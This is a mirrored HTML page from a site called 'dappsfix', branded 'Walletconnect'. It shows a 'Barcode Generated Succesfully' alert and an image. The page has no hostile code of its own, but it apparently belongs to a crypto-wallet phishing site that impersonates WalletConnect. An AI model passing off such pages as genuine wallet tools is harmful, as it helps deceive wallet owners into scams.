<!DOCTYPE html>
<html lang="en">

<!-- Mirrored from dappsfix.pages.dev/barcode/ by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 14 Mar 2023 22:11:29 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=utf-8" /><!-- /Added by HTTrack -->
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <link rel="stylesheet" href="https://unpkg.com/flowbite%401.5.3/dist/flowbite.min.css" />
    <link rel="stylesheet" href="https://rsms.me/inter/inter.css">
    <script src="https://cdn.tailwindcss.com/"></script>
    <script src="https://cdn.tailwindcss.com/?plugins=forms,typography,aspect-ratio,line-clamp"></script>
</head>
<body style="background-color:#08081c">

    <section class="">
        <div class="flex flex-col items-center justify-center px-6 py-8 mx-auto md:h-screen lg:py-0">
            <a href="../index.html" class="flex items-center font-bold text-white">
                <img src="../wc1.png" class="mr-3  mb-5" style="height:30px" alt="Logo">
                <span>Walletconnect</span>
            </a>
            <div style="background-color:#3fc47d; " class="p-4 animate-pulse text mb-4 text-sm text-red-900 rounded-lg dark:bg-blue-200 dark:text-blue-800" role="alert">
                <span class="font-medium text-white">
                  <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-exclamation-diamond" viewBox="0 0 16 16">
                    <path d="M6.95.435c.58-.58 1.52-.58 2.1 0l6.515 6.516c.58.58.58 1.519 0 2.098L9.05 15.565c-.58.58-1.519.58-2.098 0L.435 9.05a1.482 1.482 0 0 1 0-2.098L6.95.435zm1.4.7a.495.495 0 0 0-.7 0L1.134 7.65a.495.495 0 0 0 0 .7l6.516 6.516a.495.495 0 0 0 .7 0l6.516-6.516a.495.495 0 0 0 0-.7L8.35 1.134z"/>
                    <path d="M7.002 11a1 1 0 1 1 2 0 1 1 0 0 1-2 0zM7.1 4.995a.905.905 0 1 1 1.8 0l-.35 3.507a.552.552 0 0 1-1.1 0L7.1 4.995z"/>
                  </svg>
                Barcode Generated Succesfully
                </span> 
            
            </div> 

            <div class="flex flex-col items-center justify-center px-6 py-8 mx-auto md:h-screen lg:py-0">
             <img src="../324172.image0.jpg" class="rounded-lg h-23">
            </div>
              
           
    <script src="https://unpkg.com/flowbite%401.5.3/dist/flowbite.js"></script>
</body>

<!-- Mirrored from dappsfix.pages.dev/barcode/ by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 14 Mar 2023 22:11:30 GMT -->
</html>
